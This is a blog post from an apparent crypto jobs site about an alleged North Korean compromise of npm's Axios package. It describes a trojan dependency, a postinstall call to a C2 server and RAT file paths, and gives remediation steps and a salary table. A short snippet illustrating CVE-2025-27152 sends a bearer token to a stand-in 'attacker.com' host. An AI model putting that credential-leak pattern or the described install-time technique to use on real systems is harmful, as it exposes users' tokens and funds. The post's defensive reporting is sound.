North Korea Just Backdoored npm's Most Popular HTTP Library. Crypto Was the Target.

March 31, 2026 · 6 min read

Yesterday, North Korean hackers published backdoored versions of Axios — the HTTP client installed in roughly 80% of JavaScript environments — and the payload was designed to steal crypto wallets.

This isn’t hypothetical. It happened in real time. And if your DeFi backend, exchange API, or trading bot ran npm install during a 2-3 hour window on March 30-31, you may already be compromised.

What Happened

Attackers hijacked the npm account of Axios’s lead maintainer and published two poisoned versions: axios@1.14.1 and axios@0.30.4. Both were tagged as latest, meaning any fresh install pulled malicious code by default.

The attack was surgical:

  1. Pre-staged a trojan dependencyplain-crypto-js@4.2.1, a weaponized copy of the legitimate crypto-js library — 18 hours before the main attack
  2. Hijacked the maintainer’s npm account, changed the recovery email to a ProtonMail address
  3. Published the backdoored Axios versions with plain-crypto-js as a new dependency
  4. Within 2 seconds of npm install, a postinstall script phoned home to a C2 server — before npm even finished resolving other packages

The payload was a cross-platform Remote Access Trojan:

  • macOS: /Library/Caches/com.apple.act.mond
  • Windows: %PROGRAMDATA%\wt.exe
  • Linux: /tmp/ld.py

Google’s Threat Analysis Group attributed the attack to UNC1069, a North Korean unit with a documented history of targeting cryptocurrency companies.

Why Crypto Was the Primary Target

This wasn’t a random supply chain attack that happened to catch crypto companies. Crypto was the point.

The RAT was specifically instrumented to exfiltrate wallet credentials and private keys. The trojanized dependency was named plain-crypto-js — a deliberate mimicry of the crypto-js library that’s ubiquitous in blockchain applications. And the attribution points to the same North Korean apparatus that pulled off the Bybit hack ($1.5B), Ronin Bridge exploit ($625M), and Harmony Horizon attack ($100M).

North Korea’s crypto theft operations now fund a meaningful percentage of the country’s GDP. Their attack sophistication has evolved from phishing and social engineering to supply chain compromise at the infrastructure layer. They’re not targeting individual wallets anymore. They’re targeting the tools that every crypto developer depends on.

Consider what runs on Axios in the crypto ecosystem:

  • Exchange backends making API calls to liquidity providers
  • DeFi protocols fetching oracle prices
  • Trading bots executing automated strategies
  • Wallet services communicating with blockchain nodes
  • Custody platforms interfacing with HSMs and signing services

Any of these systems that pulled the malicious version could have leaked API keys, signing credentials, or private keys to the attacker’s infrastructure.

The Vulnerability That Preceded the Attack

This wasn’t the first Axios security incident. In early 2025, CVE-2025-27152 revealed that Axios had a critical SSRF and credential leakage bug — a flaw where authentication headers configured on an Axios instance would be forwarded to attacker-controlled URLs.

The mechanism was straightforward: if you created an Axios instance with a baseURL and Authorization header, and the request path contained an absolute URL (which could come from user input), Axios would send the request to the absolute URL — with your credentials still attached.

const client = axios.create({
  baseURL: 'https://trusted-api.com',
  headers: { 'Authorization': 'Bearer SECRET_TOKEN' }
});

// If an attacker controls this URL:
client.get('https://attacker.com/steal');
// Your SECRET_TOKEN is now in attacker's hands

This bug affected all Axios versions before 1.8.2 and carried a CVSS score of 7.7 (HIGH). For crypto applications — where “leaked credentials” can mean “drained wallets” — the impact was severe.

The credential leakage CVE and the supply chain attack are different attack vectors, but they expose the same structural problem: the crypto industry’s most sensitive infrastructure depends on general-purpose npm packages maintained by small teams with minimal security resources.

Why AI Didn’t Catch This (And Why It Might Next Time)

The security industry is betting heavily on AI-powered code analysis and threat detection. So why didn’t AI tools flag any of this?

The postinstall timing exploit. The malicious code executed during npm install, before any application code ran. Most AI-powered security scanners analyze application source code or runtime behavior — not the install-time execution of transitive dependencies. The attack operated in a blind spot.

Behavioral mimicry. The trojanized plain-crypto-js package was a near-identical copy of the legitimate crypto-js, with the malicious payload injected into rarely-inspected build scripts. Static analysis tools that compare package contents against known-good versions would need to diff every file in every transitive dependency on every install — a problem that scales poorly without significant compute.

The naming game. Typosquatting and namespace confusion remain effective precisely because they exploit human trust patterns that AI models are trained on the same data to replicate. An AI reviewing a package.json diff that adds plain-crypto-js might flag it as suspicious — but only if it’s been specifically trained to distinguish between the hundreds of legitimate crypto-* packages and their malicious doppelgangers.

Where AI is starting to make a difference:

  • Behavioral anomaly detection — tools like Socket.dev use AI to flag packages that make unexpected network calls, access the filesystem, or execute postinstall scripts with obfuscated code
  • Dependency provenance tracking — AI-powered supply chain security platforms can verify that published packages match their source repositories
  • Real-time threat intelligence — the Huntress analysis that identified 135 compromised endpoints within hours relied on machine learning models correlating network telemetry across their customer base

The gap isn’t in AI’s capability — it’s in deployment. Most crypto projects don’t run supply chain security tooling at all. They install packages, trust the maintainer, and ship.

The Security Talent Gap Is Now an Existential Risk

Here’s where this gets relevant for hiring. The Axios attack exposed a problem that money alone can’t solve: the crypto industry doesn’t have enough security engineers who understand both blockchain systems and supply chain security.

The roles that could have prevented or mitigated this attack — or the next one — are chronically understaffed:

RoleWhat They’d Have CaughtTypical Comp (USD)
Supply Chain Security EngineerMalicious dependency injection, postinstall exploits$180,000 – $280,000
Application Security EngineerSSRF, credential leakage patterns (CVE-2025-27152)$170,000 – $260,000
Threat Intelligence AnalystUNC1069 TTPs, pre-staged package patterns$150,000 – $220,000
Incident Response LeadC2 detection, RAT containment, key rotation$160,000 – $250,000
DevSecOps EngineerLockfile enforcement, dependency pinning, CI/CD hardening$150,000 – $230,000
Smart Contract AuditorOn-chain impact analysis post-compromise$200,000 – $350,000+
Security Architect (Crypto)HSM/MPC key management, zero-trust infrastructure$200,000 – $300,000

These aren’t nice-to-have positions. After yesterday, they’re table stakes.

What You Should Do Right Now

If you’re running any Node.js application in the crypto ecosystem:

1. Check your Axios version immediately.

npm ls axios

If you see 1.14.1 or 0.30.4, you are compromised. Isolate the affected systems, rotate all credentials, and scan for the RAT artifacts listed above.

2. Pin your dependencies. Use exact versions in package.json and commit your package-lock.json. Never rely on latest tags in production.

3. Audit postinstall scripts. Run npm install --ignore-scripts in CI and explicitly allowlist packages that need postinstall execution.

4. Deploy supply chain security tooling. Socket.dev, Snyk, and npm’s built-in npm audit signatures can detect tampered packages. If you’re handling user funds, this isn’t optional.

5. Assume compromise. If your infrastructure ran npm install between March 30 22:00 UTC and March 31 03:00 UTC, treat it as a security incident. Rotate API keys, wallet signing keys, and session secrets.

The Bigger Picture

The crypto industry is building financial infrastructure that holds billions in user funds on top of a software supply chain designed for blogs and todo apps. The npm ecosystem was never architected for adversaries with nation-state resources and nine-figure financial motivation.

Yesterday’s attack was contained within hours. The next one might not be. The gap between the sophistication of crypto’s attackers and the maturity of its security practices is the single biggest risk the industry faces — bigger than regulation, bigger than market cycles, bigger than smart contract bugs.

The people who close that gap will be the most important hires in Web3 for the next decade. The ones who are already doing this work are among the highest-paid engineers in the industry.

The question isn’t whether another attack like this will happen. It’s whether you’ll have the team in place when it does.

Related reading: Anthropic Leaked Claude Code’s Source — What It Means for Crypto Devs · Google Quantum Paper Threatens 6.9M BTC · The 20 Millionth Bitcoin Was Mined — Who Gets Paid to Secure the Rest?

Explore security and infrastructure roles at cryptogrind.com →

securitysupply-chainnpmaxioscryptonorth-koreajobsaivulnerabilities